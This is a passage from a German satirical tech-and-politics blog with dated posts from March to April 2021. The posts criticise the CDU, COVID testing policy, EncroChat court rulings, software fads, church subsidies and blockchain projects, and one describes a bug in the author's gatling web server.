Several bank representatives who fielded fraud claims directly from consumers estimated that WinRed cases, at their peak, represented as much as 1 to 3 percent of their workload. An executive for one of the nation’s larger credit-card issuers confirmed that WinRed at its height accounted for a similar percentage of its formal disputes.
That figure may seem small at first glance, but financial experts said it was a shockingly large percentage, considering that political donations represent a tiny fraction of the overall United States economy.
3% aller Fraud Claims in den USA!
Make America Great Again!
Drain The Swamp!
[l] Seid ihr auch ein bisschen irritiert, was das Selbsttestgehampel jetzt soll?
Ist doch völlig klar, dass Impfung viel wichtiger ist als Testen! Testen ist gut und wichtig, damit man akkurate Statistiken hat. Aber für alles andere sind sie ziemlich ungeeignet bis wertlos.
Nun, da gibt es eine einfache Erklärung, die ich hier mal zitieren möchte:
Ich habe immer mehr das Gefühl, dass die Eindämmung der Pandemie oder auch nur die objektive Auseinandersetzung mit Daten bei einigen Politikern nie das Ziel war, nur die Frage, wie man das jetzt irgendwie laufen lassen kann ohne hinterher verantwortlich gemacht zu werden
Genau so sieht es aus.
Die rituellen Kulthandlungen mit den Selbsttests jetzt gerade, die dienen nur einem Zweck: Das Versagen beim Impfen zu vertuschen.
Ich für meinen Teil will keine Tests. Ich will eine Impfung.
Die ganzen Tests von dem Spahn kann der Scheuer von mir aus zum Reparieren der Schlaglöcher in den Autobahnen verwenden.

Thu Apr 1 2021

[l] Kennt ihr den schon?
In Finnland und Schweden stehen seit heute nacht die meisten Taxen, Busse und kommunalen Fahrdienste still.
Und zwar haben die ein "Alkoholschloss", bei dem der Fahrer negativ testen muss, bevor er losfahren darf. Das haben die Helden bei einem privaten Anbieter gekauft, und es ist cloudbasiert und man muss sich einloggen (wegen … hey warum nicht?! Ist modern!1!!) und hat gerade einen Ausfall.
Bonus: Der Hersteller heißt auch noch Dignita (lat. dignitas = Würde). Ja, klar, so ein erzwungener Alkoholtest, das ist geradezu ein Fanal der Würde!
Bei der Gelegenheit will ich mal kurz einen Rant raushauen, an dem ich mich schon länger reibe. "Deutsche Unternehmen wollen ihre Netze modernisieren". NEIN! Hört endlich auf mit dem "modernisieren"! Modernisieren ist das neue Harmonisieren und davor war es das Reformieren! Das ist alles Geldverbrennung, solange ihr immer nur dieselben Fäkalien einmal durchrührt.
Das Ziel ist nicht "modern". Das Ziel ist "ordentlich". Macht es einmal ordentlich! Scheißt auf Konventionen und Zeitungen und Schlangenölverkäufer, die euch irgendwelche Bullshit-Trends reindrücken wollen. Ihr braucht keine Blockchain, keine Microservices, kein Node.js, ihr braucht keine verteilten Systeme, kein Kubernetes. Ihr braucht keine Key-Value-Stores mit "eventual consistency". Ihr braucht keinen Message Bus, kein MongoDB, ihr braucht nichts von dem ganzen Scheiß. Was ihr braucht ist ein klares Konzept, eine ordentliche Anforderungsdefinition, ein Verständnis dafür, was ihr eigentlich erreichen wollt. Ein Verständnis für das Umfeld, in dem eure Lösung arbeiten soll.
Ich glaube ja, ich habe jahrelang einen Fehler gemacht, als ich Software Engineering und Software Development für synonym gehalten habe. Die Agile-Fraktion versteht unter Software Development eher sowas wie Film Development. Nicht den Architekten, der eine Brücke baut. Eher einen Naturfilmer, der einem Korallenriff beim Wachsen zuguckt. Agile sieht in der Praxis für mich immer mehr nach Merkel-Politik aus. Man wartet solange, bis das Umfeld nur noch eine alternativlose Option offen lässt, und die macht man dann. Da kommt dann halt kein Diamant raus sondern eher ein Broccoli.
Der Ingenieur sieht seine Aufgabe darin, das Gerüst zu schaffen. Der Entwickler hat einen Film, auf dem die Fotos schon drauf sind, und sieht es nicht als seine Aufgabe, dass da am Ende was brauchbares rauskommt. Aus dessen Sicht sind die Würfel schon gefallen.
Gut, ein bisschen Ingenieur ist auch in den meisten Developern drin, daher versucht dann jedes Team nochmal eigene Freiheiten herbeizudefinieren, innerhalb derer sie Dinge besser als das bescheuerte andere Team da drüben regeln können. So hat dann jeder einen eigenen Server in einer eigenen JVM in einem eigenen Container, zieht all die Dependencies nochmal in Kopie rein, hat am besten auch nochmal eine private Datenhaltung in der eigenen Datenbank, loggt am besten auch nochmal auf die eigene Platte, und es gibt eine eigene Gruppe an Admins, die für die Administration zuständig ist. So blüht dann auf jedem Server aus dem Bakterienschleim eine schöne Eiterblase, und am Ende sieht das aus wie ein Broccoli beim Reifen. Jedes Team eine eigene Blüte, und alle konkurrieren sie um Einfluss im Strunk, der mit dem Gewicht des Gesamtkonstrukts überfordert ist. (Danke, Philipp)

Tue Mar 30 2021

[l] Kurze Durchsage der CDU:
Wir sind als Partei der Mitte der innovative Kern deutscher Politik. Wir wollen & können sprudelnder Quell kreativer Ideen für nachhaltige Umwelt-, Energie-, Wirtschafts- & Digitalpolitik sein.
Jahaa, meine Damen und Herren! Wenn ihr an innovative Politik, kreative Ideen und nachhaltige Umwelt-, Energie-, Wirtschafts- und Digitalpolitik denkt, wem fällt da nicht als erstes die CDU ein! Schnell, erinnert sich noch jemand an die letzte Innovation der CDU? Fällt jemandem eine kreative Idee ein?
Mit der nachhaltigen Umweltpolitik meinen sie bestimmt den freidrehenden Altmaier, der erst Solar und dann Windkraft systematisch zerstört hat in Deutschland. Nachhaltiger kann man Umweltzerstörung kaum betreiben!
Und die Wirtschaftspolitik! Hach! Wie die CDU mit ihren Halb-Lockdowns seit einem Jahr die Industrie in Deutschland in den Boden zu stampfen versucht, das kennt in der Tat in der Nachkriegsgeschichte Deutschlands nichts vergleichbares. Erstaunlich bloß, wie resilient sich die Wirtschaft erwiesen hat (gut, bis auf so Randgruppen-Wirtschaft wie Restaurante und Einzelhandel). Aber komm, seit wann hat Wirtschaft was mit Einzalhandel zu tun!1!!
War noch was? Gesundheitspolitik nennen sie gar nicht. Verstehe ich gar nicht. Verkehrspolitik auch nicht. Na sowas. Oh aber Digitalpolitik war da noch. Ja, die CDU, die Partei der Digitalpolitik. Die mit den Uploadfiltern, die mit den Kupferkabeln von Schwarz-Schilling. Die, die unsere Infrastruktur komplett abhören wollen. Die Digitalpartei, die eingescannte Faxe als PDF per E-Mail verschicken lässt, wo sie dann abgetippt werden.
When I think digital, I think CDU!
Lange nicht mehr so herzhaft gelacht. Danke, CDU!
Aber wartet, geht noch weiter, der Tweet.
@ArminLaschet macht klar: Wir wollen ein #Modernisierungsjahrzehnt für 🇩🇪 gestalten.
Ooooh, Modernisierung! Na das ist ja auch mal dringend nötig, nach 20 Jahren Stillstand, den uns die CDU gebracht hat. Klar, das ist genau die Partei, denen wir jetzt die Modernisierung zutrauen sollten. Das sieht nur so aus, als hätten sie bisher nichts gemacht! Die haben bloß Anlauf genommen!! Ab jetzt geht die Post ab, sage ich euch! Gut, nicht die Post-Post. Die ist ja von der CDU kaputtprivatisiert worden. Das muss diese nachhaltige Wirtschaftspolitik sein, von der man immer so viel hört!
[l] Gestern wies ich noch darauf hin, das Vater Staat und die Justiz gerade ein Framing aufbauen, um die Totalüberwachung verschlüsselter Kommunikationssysteme zu rechtfertigen.
Heute sind wir einen Schritt weiter:
Schon die Verwendung eines Kryptographischen-Handys der Fa. EncroChat deutet auf konspiratives Verhalten zur Begehung und Verdeckung von Straftaten hin (OLG Bremen, Beschluss vom 18. 12.2020 – 1 Ws 166/20 – Juris- ).
Und im Gegensatz zu den ansonsten mittelalterlichen USA haben wir ja auch das zentrale Mittel zum ehrlich halten der Polizei hier nicht: Dass illegal gewonnene Beweismittel automatisch nicht zulässig sind.
Soweit der Beschuldigte die Ansicht vertreten läßt, die EncroChat-Erkenntnisse und die darauf aufbauenden Beweisergebnisse seien prozessrechtlich nicht verwertbar, teilt der Senat die Auffassung nicht.
Seht ihr? Fertig! Findet der Senat nicht, damit ist die Nummer geritzt. Nein nein, liebe Beobachter, das ist nicht richterliche Willkür. Das ist business as usual vor deutschen Gerichten.
Und in der Tat hat sich das OLG Rostock das nicht einfach so aus dem Arsch gezogen, sie haben übernommen, was die Kollegen vom OLG Bremen fanden, dem sich auch das OLG Hamburg schon freudestrahlen angeschlossen hat.
Die Argumentation ging in Bremen so:
Eine unrechtmäßige Erlangung der Daten durch die französischen Behörden sei nicht ersichtlich. Ebenso sei nicht ersichtlich, dass die Daten nach dem Willen des weiterleitenden Staates nicht für ein Strafverfahren verwendet werden dürften. Da auch nichts dafür spreche, dass sich die deutschen Behörden gezielt einer ausländischen Behörde bedient hätten, um Kompetenzen auszuüben, die ihnen nicht zustünden, um so die Grenzen deutschen Rechts willkürlich zu unterlaufen, bestünde keine Grundlage für ein begründungsbedürftiges Beweisverwertungsverbot.
Ja klar, wenn man nicht hinguckt, dann sieht man auch nicht, ob die Daten von den Franzosen illegal erlangt wurden.
Was haben die Franzosen denn genau übermittelt, fragt ihr?
Aus einem in Frankreich geführten Ermittlungsverfahren seien dem BKA im Rahmen des internationalen polizeilichen Datenaustausches Daten zur Verfügung gestellt worden, aus denen sich die EMEI von in Deutschland eingebuchten Mobilfunkgeräte mit E-Mail-Adresse des Mobilgerätes und der jeweiligen Kontaktpartner, Datum, Uhrzeit und Funkmaststandort der jeweiligen Kommunikation sowie Kommunikationsinhalte bestehend aus Chatnach-richten und übermittelten Bilddateien ergäben.
So läuft das in unserem "Rechtsstaat". Die französischen Behörden werfen einen Sack mit Daten über die Mauer, die ihnen bestimmt ein Vögelchen gezwitschert hat, denn eine andere legale Erklärung für deren Herkunft sehe ich gerade nicht. Unsere Behörden sagen, diese Daten rechtfertigen einen Verdacht. Ja, äh, was hat denn dan den Verdacht gerechtfertigt, der dann in Frankreich dazu gefürt hat, diese Daten überhaupt erst zu extrahieren?!
Ich bin ja auch ein Freund davon, Kriminelle einzulochen. Aber ich komme nicht umhin, mich über die ... Flexibilität unserer Justiz zu wundern, denen es gegen "den Kriminellen" (woher wisst ihr denn das, dass der kriminell ist und Strafe verdient hat?!) offensichtlich illegal erworbenes Beweismaterial zulässt, aber deren Standards bezüglich der Herkunft der Daten aus Frankreich mehrere Größenordnungen weniger voreingenommen ist und einfach in die Gegenrichtung annimmt, dass das schon alles seine Richtigkeit gehabt haben wird.
Wenn ich das richtig sehe, haben die Bremer dann noch Hausdurchsuchungen und weitere Maßnahmen gemacht und echte, verwertbare Beweise gefunden. Soviel Arbeit macht sich das OLG Rostock nicht. Die sagen einfach: Hier sind die Chatnachrichten, schuldig!1!!
Ich weiß ja nicht, ob den Rostocker Richtern klar ist, dass es sich hier um Bits handelt. Bits kann jeder machen. Ich kann Bits machen, in denen steht, dass die Rostocker Richter miteinander gechattet haben. In die Bits kann ich jede IMEI der Welt reintun. Ob die Rostocker Richter dann auch einfach so glauben würden, dass die Daten a) echt, b) glaubwürdig, c) aus legaler Quelle und d) als Beweismittel ausreichend sind?
Hey, zur Not könnte ich meinen schönen Bits auch durch die französischen Strafverfolgungsbehörden tunneln, wenn sie dann glaubwürdiger sind!1!!

Fri Mar 26 2021

[l] Ich fand als Kind immer faszinierend, wenn im Museum Gegenstände ausgestellt waren, und dann auf dem Erklärschild daneben stand, wofür das verwendet war.
Ganz häufig war das dann "rituelle Handlungen" oder so. "Kulthandlungen".
Fand ich super damals und fragte mich, woher die das wussten.
Heute habe ich eine andere Perspektive darauf. Kulthandlungen heißt nicht, dass wir wissen, was die da gemacht haben, sondern dass wir entweder keine Ahnung haben, wieso die das Ding brauchten, oder es erscheint uns völlig nutzlos und überflüssig und wir sagen uns: Das war bestimmt irgendwas religiöses. Denn für rationale Anwendungen braucht man das nicht.
Auch Stonehenge ist so ein Ding. Erst hieß es: Das haben bestimmt Druiden für ihre Rituale benutzt. Dann hießt es: Astronomie? Aber nicht wirklich, denn du brauchst ja keine Monolithen, die so aufgebaut sind, dass sie zur Sommersonnenwende genau das eine Sternbild durchlassen. Wenn sie das tun, dann wusstest du das ja schon vorher, dass du die so aufbauen musst, dass das passiert. Das war also kein Messinstrument und nicht nötig für die Erkenntnis.
Worauf ich hinaus will: Der Großteil unserer heutigen Software und vor allem der Methodologie sind auch rituelle Kulthandlungen.
Unter der Dusche male ich mir gerne aus, wie ein zukünftiger Archeologe Apache Kafka findet. Der grübelt dann ein paar Monate mit seinen Kollegen herum, und dann kommen sie zum Schluss: Das war für rituelle Handlungen und hatte religiöse Konnotationen. Denn brauchen tut man sowas nicht.
Das soll jetzt keine Kafka-Bashing sein, das war bloß das erste Beispiel, das mir gerade einfällt. Unsere Welt ist voll mit rituellen Kultobjekten, besonders unsere Softwarewelt.
Alleine die ganzen Schneeflocken-Buildsysteme, die da draußen so im Einsatz sind. Da fällt mir auch heute schon keine andere Erklärung ein als dass das für Kulthandlungen da ist. Da wollte jemand sichergehen, im Leben nach dem Tod etwas vorzeigen zu können.
Oder nehmen wir mal Slack oder Teams. Das hat keine positive Auswirkung, das ist reines Ritual. Es unterbricht die Leute, lenkt sie ab, senkt die Produktivität spür- und messbar. Trotzdem kaufen die Firmen das als wäre Black Friday bei Walmart, trampeln sich gegenseitig tot beim Versuch, den Scheiß schneller einzuführen als die anderen.
Rituelle Kulthandlungen.
Warum haben wir eigentlich alle OO gemacht? Rituelle Kulthandlung!
Warum waren plötzlich Skriptsprachen so ein Renner? Rituelle Kulthandlung!
Wieso stehen jetzt plötzlich alle auf Static Code Analysis? Dieselben Leute, die jahrelang die Warnungen ausgeschaltet und die Restwarnungen ignoriert haben? Rituelle Kulthandlungen!
[l] Nachdem der Trump jetzt weg ist, und wir uns alle einig sind, dass Fox News hysterische Propagandisten sind … können wir uns jetzt darauf einigen, dass die anderen Medien genauso scheiße sind?
Hier hat jemand einen schönen Supercut gemacht. Donald Trump is over. The walls are closing in. This is the beginning of the end. We have another bombshell. This could be a tipping point!
So und jetzt fragt euch mal, wie das mit unseren Medien hier ist.
Da könnte auch mal jemand einen schönen Supercut über die Covid-Berichterstattung machen.
[l] Falls ihr euch gefragt habt, wie das aussieht, wenn die CDU vorgibt, etwas gegen Korruption zu tun: Hier ist die Antwort.
Es verpflichtet professionelle Interessenvertreter dazu, sich in ein öffentlich einsehbares Register einzutragen und dort Angaben über ihre Auftraggeber und die finanzielle Aufwendungen zu machen.
Das ist schonmal nicht schlecht. Der Ladebalken ist bei 3%.
Treffen in Ministerien sollen bis hinunter zur Ebene von Unterabteilungsleitern erfasst werden.
Erfasst, ja? Aber nicht öffentlich einsehbar, nehme ich an? Steht da nicht. Ladebalken immer noch bei 3%.
Zudem müssen sie einem Verhaltenskodex zustimmen, der Grundsätze integrer Interessenvertretung definiert.
Aha, eine "non binding resolution", wie man so schön sagt. Die Abgeordneten setzen weiterhin auf "freiwillige Selbstkontrolle". Dass ich nicht lache. Ladebalken weiter bei 3%.
Verstöße sollen als Ordnungswidrigkeit geahndet werden, etwa durch den Entzug von Hausausweisen oder Geldbußen von bis zu 50.000 Euro.
Verstöße klingt ja erstmal, als ob sich das gegen korrupte Parlamentarier richtet, aber bei "Entzug von Hausausweisen" ist dann spätestens klar, dass sich das auf Lobbyisten bezieht, die sich nicht ins Lobbyregister eingetragen haben.
Leider müsste man ihnen dafür nachweisen, dass sie "professionelle Interessensvertreter" sind. Das kommt mir wir keine große Hürde vor. Sagst du einfach: Ich bin Ex-CDU-Abgeordneter und wollte nur mal vorbeigucken, der alten Zeiten wegen. Viele Lobbyisten kommen ja selbst aus dem System.
Gut, also damit sind wir, ich fasse mal zusammen, bei einer Art Perso-Pflicht für Lobbyisten, und einer nicht-bindenden freiwilligen Selbstverpflichtung der Parlamentarier.
Meine Güte, die Korruption ist so gut wie besiegt!!1!
OK, gut, kommen wir zu den nächsten 97%? *blätter* *scroll*
Öhm. Ich habe schlechte Nachrichten für euch. Das war alles.
Nicht nur war das alles, das war sogar mehr als alles, denn ein Teil davon wird direkt wieder zurückgenommen:
Ausgenommen von der Pflicht sind unter anderem Gewerkschaften und Arbeitgeberverbände, politische Stiftungen sowie die Kirchen und Religionsgemeinschaften.
D.h. Daimler tunnelt ihre Lobbyarbeit ab jetzt einfach durch die Arbeitgeberverbände und ist fertig.
Ladebalken springt zurück auf 1%.
Hey, warte mal, fällt euch überhaupt irgendein Lobbyist ein, der nicht für die Arbeitgeber oder Gewerkschaften arbeitet? Welche Korruption bleibt denn da übrig? Habt ihr darüber mal nachgedacht?
Ich sage euch, wer da übrig bleibt. Menschenrechtler. Datenschützer. Leute, die gegen Hackertoolverbote und Staatstrojaner sind.
Der Ladebalken springt auf -10%.
Oh wartet, einen Aspekt müsste man noch beleuchtet. Mit dieser Satirenummer ist die Sache ja dann erledigt. Wenn morgen jemand über Korruption meckert, können und werden die sagen: Wieso, wir haben doch gerade unsere Korruptionsbekämpfungsgesetze verschärft!1!!
Unter dem Strich steht der Ladebalken bei -20%. Nicht nur nichts erreicht, sondern die Dinge auch noch schlimmer gemacht.
Dass die CDU uns so offen ihre Verachtung ausdrückt, wundert ja niemanden mehr, aber ohne die korrupte SPD hätten sie das nicht durchgekriegt. Alle anderen waren dagegen. Ich vermute mal, die SPD hatte starke Bauchschmerzen und ist zeigt auf die CDU, dass sie mit ihren weitergehenden Forderungen nicht durchgekommen sind. Aber als Ausgleich haben sie dem CDU-Entwurf (der bloß Kirchen und Arbeitgeber ausnahm) auch Korruption durch Gewerkschaften hinzugefügt. So hat jeder seine Pfründe gesichert und kein Abgeordneter muss jemals fürchten, für seine Korruption in den Knast zu kommen und sein Gehalt zurückzahlen zu müssen.
Eine Sache, die ja Mindestanforderung gewesen wäre, ist dass bei Gesetzen die Versionsgeschichte öffentlich schwellenfrei nachvollziehbar ist. Damit man mal sehen kann, wieviel von den Gesetzen von denen gemacht werden, die sich dafür fürstlich vom Steuerzahler "entlohnen" lassen. Und wieviel von Industrievertretern geschrieben und dann übernommen wird.
Davon ist in diesem Gesetz natürlich nichts zu sehen. Und alle sind irritiert, wie das soweit kommen konnte.
Das kann ich euch sagen, wie das soweit kommen konnte. Jemand hat seine Stimme der CDU oder der SPD gegeben. So kommt sowas.
Du weißt, dass dein Korruptionsbekämpfungsgesetz eine Farce ist, wenn es sogar der FDP nicht weit genug geht. *wieher*

Thu Mar 25 2021

[l] Das wird euch jetzt vermutlich genauso schockieren wie mich, aber Axel Voss ist noch im Amt, und macht weiterhin, was er am besten kann: Alles kaputt.
Voss beklagt etwa, dass der zweckorientierte, risikobasierte Ansatz aus der DSGVO so gut wie nicht beachtet werde, wonach Verbote und Einschränkungen der Datenverarbeitung von einer Risikoanalyse abhängig gemacht werden sollen. Mittlerweile gehe es "immer nur noch um den 100-prozentigen Datenschutz", eigentlich sogar noch mehr.
Ja genau. Wir müssen endlich diese DSGVO kaputtmachen. Die stehen Voss' edlen Wahlkampfspendern bei der der Verfolgung von Raubmordkopieren im Weg!
Datenschutz ist Täterschutz!1!!
Ich bin mir sicher, er wird uns jetzt noch wie bei den Uploadfiltern ins Gesicht lügen, dass sich aus seinen Ideen kein Nachteil für die Bürger ergäbe.
Mann ich kann es gar nicht erwarten, dass diese durch und durch korrupte Union bei den Wahlen endlich mal so richtig aus den Parlamenten gefegt wird.

Wed Mar 24 2021

[l] Bezüglich meines Kirchen-Gemeckers kamen ein paar interessante Leserbriefe rein. Jemand merkte an, dass die Kirchen auch im Arbeitsrecht von den Errungenschaften der Neuzeit ausgenommen sind.
Das werden die meisten von euch wissen.
Aber was der nächste schrieb, war mir zumindest völlig neu: Der Friede von Lunéville. Wir reden hier vom Jahre 1801. Das war der Friedensschluss zwischen Frankreich nach der französischen Revolution und dem Heiligen Römischen Reich. Frankreich hatte vorher die linksrheinischen Gebiete militärisch erobert, und das Reich war nach einer Ausweitung in Richtung Polen interessiert und bestand daher nicht auf der Rückgabe.
Ich zitiere mal von Wikipedia:
In den Geheimartikeln des Friedens von Campo Formio bestätigte 1797 auch Kaiser Franz II. Frankreich das Recht auf die Inbesitznahme der linksrheinischen Gebiete. Die deutschen Staaten sollten dafür im Gegenzug mit rechtsrheinischem Kirchenbesitz entschädigt werden (Säkularisation). Im Frieden von Lunéville wurde die Entschädigungszusage (Artikel 7) erstmals öffentlich bekannt.
Ja, meine Damen und Herren. Es geht hier um Napoleon. Der hatte in Frankreich einen Deal mit der katholischen Kirche gemacht. Also die Art von Deal jetzt, wo eine Seite der anderen eine Schusswaffe an die Schläfe hält.
In diesem Vertrag, den Napoleon als Vertreter der Ersten französischen Republik und Kardinal Ercole Consalvi als Vertreter Papst Pius VII. unterzeichneten, erkannte der Papst die Französische Republik, den Zivilstand der Katholischen Kirche und die von Napoleon angeordnete Entlassung aller Bischöfe an.
Schon krass, wie schwach die katholische Kirche damals war:
Pius VII., der später, 1804, zur Mitwirkung an der Kaiserkrönung Napoleons genötigt wurde und im Streit mit dem Kaiser 1806 bis 1814 in Gefangenschaft geraten sollte
Whoa.
So, diese Zustände sahen jedenfalls die deutschen Fürsten, und dachten sich anlässlich des Friedens, in dem Deutschland auf die linksrheinischen Ländereien verzichtete: Dann greifen wir doch mal der katholischen Kirche in die Taschen, die können sich gerade nicht wehren.
Ergebnis:
Diese Säkularisation wird 1803 mit einem Reichsdeputationshauptschluss in die Tat umgesetzt. Zwei geistliche Kurfürstentümer, neun Hochstifte und mehr als 40 Abteien werden aufgelöst, 45.000 Quadratkilometer Land wechseln ihren Besitzer, und etwa fünf Millionen Menschen haben einen neuen Landesherrn. Die beiden Kirchen bekommen von Gewinnern der Säkularisation eine Entschädigung, über deren Höhe in der Folgezeit entschieden wird.
Ja und diese Entschädigung wird bis heute gezahlt, von unseren Steuergeldern, in Höhe von 549 Millionen Euro.
Wat

Fri Mar 19 2021

[l] Bevor die Leute Fotos und Videos über das Internet verbreiteten, als das alles noch Text war, gab es so einen berühmten Spruch: On the Internet, nobody knows you're a dog. Geht zurück auf ein Cartoon im New Yorker.
Heute sind wir dank Apps weiter:
Young female Japanese biker is really 50-year-old man with luscious hair using FaceApp
Die App hat offenbar einen Spiegel übersehen in einem Foto, wo man dann das unverfremdete Gesicht sehen konnte.
Der Typ sagte dazu:
The man reportedly said that nobody wants to see an "uncle", and so, he turned himself into a "beautiful woman" so that his photos would be popular.
Ich finde daran vor allem spannend, wie sehr wir daneben gelegen haben mit unseren Ideen, was die gesellschaftlichen Auswirkungen von KI sein würden. Bei Deep Fakes war praktisch die einzige Sorge, dass das in der Politik benutzt werden könnte.
Stattdessen kann jetzt offensichtlich jeder online eine junge hübsche Frau sein. Es heißt ja immer, junge Mädchen würden von den gesellschaftlichen Erwartungen an ihre Körper kaputtgemacht. Aber hat jemand diesen alten Motorradfan da auf dem Radar gehabt?

Thu Mar 18 2021

[l] Leserbrief aus NRW, von jemandem, der sich freiwillig gemeldet hat, ehrenamtlich an einem Schnelltestzentrum mitzuhelfen.
Hier ist heute ein öffentliches Testcenter an den Start gegangen. Ich bin ehrenamtliches Helferlein.
Drei Leute pro Schicht, Schutzkleidung wird gestellt.
Die Stadt hat das im Alleingang gemacht. Finanzierung ist unklar.
Aus Düsseldorf kommt nur Grillezirpen und der eine oder andere einsame Tumbleweed, wenn man Richtlinien haben will, wie man das denn machen soll.
Mein Städtchen hat jetzt ne Privatfirma ins Boot geholt, Zelte und Heizung hat das THW aufgebaut und dann sitzen pro Schicht bis zu 8 Leute in der Teststraße und testen Leute.
Stadt bezahlt erszmal aus eigenem Säckel in der vagen Hoffnung, dass D'dorf irgendwann bissi Kohle rüberwachsen läßt.
Mir fallen spontan jetzt nur Länder wie Somalia und andere failed states ein, um das Level an Generalversagen seitens Laschet und Laumann zu beschreiben.
Aber in der PK die Fresse aufreißen wie ein Großer und ganz charmant autoritär kritisch fragende Journos zusammenscheißen.
Ich hab Freitag meine erste Schicht. Acht Stunden Dienst an der Allgemeinheit.
Großartig. Auch noch die Ehrenamtler einmal durchverschleißen.
Wir sind jetzt schon in der 2. Ableitung. Eigentlich geht es um das Durchimpfen, das haben sie verkackt. Dann ging es um die Tests, das haben sie verkackt. Jetzt geht es um Freiwillige, die einspringen, um das Verkacken vorher zu lindern, die das verkacken sie auch noch. Langsam wird die Luft dünn, noch Dinge zu finden, die man verkacken kann.
[l] Die CDU ist doch die Wirtschaftspartei, nicht? Die Sozen können nicht rechnen und machen immer nur Schulden und Verlust, aber die Union, das sind die, die sich auskennen!
Aktueller Datenpunkt: Spahn hat Apotheken 6€ pro FFP2-Maske erstattet, als die im Einkauf 1€50 kosteten. Ergebnis:
Die Rechnung sei "sehr gut aufgegangen", sagt Glass. Oder, ein bisschen klarer formuliert: "Wir haben uns dumm und dämlich verdient."
Das ist ein Apotheker aus Berlin. Oder konkret:
kurz vor Weihnachten bescherte ihm Gesundheitsminister Jens Spahn noch Einnahmen von 170.000 Euro.
Boah ein Glück, dass das die CDU gemanaged hat und nicht jemand, der nicht wirtschaften kann und bloß unsere Steuergelder verprasst hätte!
Und: Gut, dass das die CDU war und keine korrupte Abgreiferpartei wie die mit der Maskenaffäre neulich. Man stelle sich bloß mal vor, wie viel Potential für Kick-Backs, Provisionen und anderweitiges in den Topf greifen es hier gegeben hätte! Pfew, da ist ja nochmal ein Kelch an uns vorüber gegangen! Das hätten wir ja nie aufgeklärt gekriegt, wenn es da Verdacht auf Korruption gegeben hätte!1!!
Ein Glück, dass es bei uns sowas nicht gibt. Alle grundehrlich, die Leute.

Wed Mar 17 2021

[l] Lustige Studie zu Office 365. Kernaussage ist, dass die Firmen, die in die Cloud migriert sind, jetzt ständig Accounts aufgemacht und geklaut kriegen.
Aber der lustigste Teil ist m.E. der hier:
Auffällig ist jedoch, dass die Managementebene ein deutlich höheres Vertrauen in die eigenen Verteidigungsfähigkeiten als praxisnahe Mitarbeiter haben.
No shit!
Das ist ja auch kein Zufall, dass die praxisnahen Mitarbeiter gar nicht erst gefragt werden. Wenn man sich vorher informieren würde, wäre man ja danach möglicherweise in der Haftung.

Mon Mar 15 2021

[l] Habt ihr eigentlich auch so ein portables EKG-Gerät im Haus?
Ihr wisst schon, Google Assistant und Amazon Alexa?
Wisst ihr noch, wie wir uns Sorgen gemacht haben, die würden unsere Privatsphäre verletzen? HAHAHA, Mann waren wir naiv!
Update: Übrigens, als Kontext dazu:
Das US-Verteidigungsministerium Pentagon will Menschen anhand ihres Herzschlags erkennen. Ein Laserscanner soll diesen aus der Distanz messen.
Ja da ist das natürlich eine enorme Ersparnis, wenn man keinen Laser braucht, und das Opfer noch selber die Kosten dafür trägt.

Sun Mar 14 2021

[l] Ich schreibe ja die meiste meiner Software, um zu lernen, wie Dinge funktionieren, und was man da beachten muss und falschmachen kann. Bei gatling war das genau so. Ich setze den zwar produktiv ein, aber dafür war der eigentlich nie gedacht. Das sieht man auch am Code, der vergleichsmäßig furchtbar ist.
Das liegt nicht daran, dass die Thematik so furchtbar komplex ist, sondern das liegt daran, dass ich die Komplexität der Thematik vorher nicht kannte, und daher architekturelle Entscheidungen getroffen habe, die rückblickend nicht schlau waren.
Das kann man jetzt als Scheitern sehen, aber ich sehe es als Gewinn. Genau deshalb habe ich das ja gemacht, damit ich lerne, was die Probleme sind, und worauf man achten muss.
Das "Protocol Error"-Problem, das ihr heute sehen konntet, lag an einer dieser architekturellen Entscheidungen. gatling war ja auf hohe Skalierbarkeit ausgelegt, kann theoretisch zehntausende von Verbindungen offen haben. Wenn ich da einen neuen Prozess für ein CGI erzeuge, dann muss irgendjemand (entweder ich von Hand oder der Kernel über close-on-exec-Flags) die ganzen Sockets zumachen, sonst erbt das CGI die. Daher hatte ich damals entschieden, dass gatling ganz am Anfang einen Prozess aufmacht, der noch keinen Ballast geerbt hat, und wenn ein neuer Prozess gebraucht wird, dann erzeugt dieser jung gebliebene Prozess den. Dem schickt der Haupt-Gatling dann einen Request, und der macht dann den neuen CGI-Prozess auf und schiebt einen Deskriptor zu diesem neuen CGI-Prozess zurück zum Hauptprogramm.
Die Tage hat mir jemand einen Bug gemeldet. Wenn man HEAD auf ein CGI macht, kommt die falsche Content-Length zurück. Die Content-Length spielt bei HEAD an sich keine Rolle, denn der Content kommt ja nicht. Insofern sagt die Spec auch, Content-Length ist bei HEAD optional. gatling ging jetzt nicht davon aus, dass jemand HEAD auf ein CGI macht, weil das ja eine sinnlose Operation ist (wie HEAD überhaupt ziemlich sinnlos ist, seit es If-Modified-Since gibt). Es war ein bisschen Code dafür da, aber das war in keiner Testsuite und es hat bis jetzt auch nie jemand gemacht glaube ich.
Der Fix dafür hat jetzt subtil die Logik gebrochen, die in dem 2. Prozess den CGI-Dateinamen zu einem Request raussucht. Daher kam da "Protocol error".
Langfristig ist der Plan, gatling nochmal neu zu machen, nachdem ich jetzt gelernt habe, was die Probleme sind.
Neue Features, die ich initial für nicht so wichtig hielt, wären multithreading und Offenhalten und Cachen von Dateien.

Sat Mar 13 2021

[l] Ich glaube ja, dass die meisten Leute da draußen gar keine Ahnung haben, wie unseriös dieser ganze Blockchain-Sumpf ist. Wir hatten neulich Iota, weil das in diesem Digitaler-Impfpass-Projekt benutzt werden soll (als eine von fünf Blockchains *schenkelklopf*), neben Ethereum.
Heute gibt es Nachrichten zu Ethereum. "Vitalik escalates ETH 2.0 merge as miners plan a 51% attack"
Vitalik Butarin ist der "Erfinder" von Ethereum, meiner Meinung nach einer der größten Blender auf dem Planeten. ETH 2.0 ist "die neue Version von Ethereum", ihr erinnert euch, sowas gab es ja auch bei Iota. Die haben euch ins Gesicht gelogen, sie hätten eine stabile, zuverlässige, betrugsfreie, flexible Superblockchain, in die ihr euer Erspartes bedenkenlos investieren könnt. Dann gab es eine Sicherheitslücke nach der anderen und deren Reaktion war jeweils, eine "neue Version" zu machen, und so zu tun, als sei damit das Problem gelöst.
Bei Iota gab es da einmal so ein Event, dass eine Sicherheitslücke gefunden wurde, über die man Geld anderer Leute abheben konnte, und die Iota-Betreiber haben dann einmal einfach so alles Geld von allen Leuten abgehoben und auf einer neuen Chain wieder eingezahlt. Die haben also selbst die Grundanforderung an eine Blockchain verletzt, die sich euch vorher zugesagt hatten, nämlich dass niemand (AUCH SIE NICHT!) euer Geld abheben können.
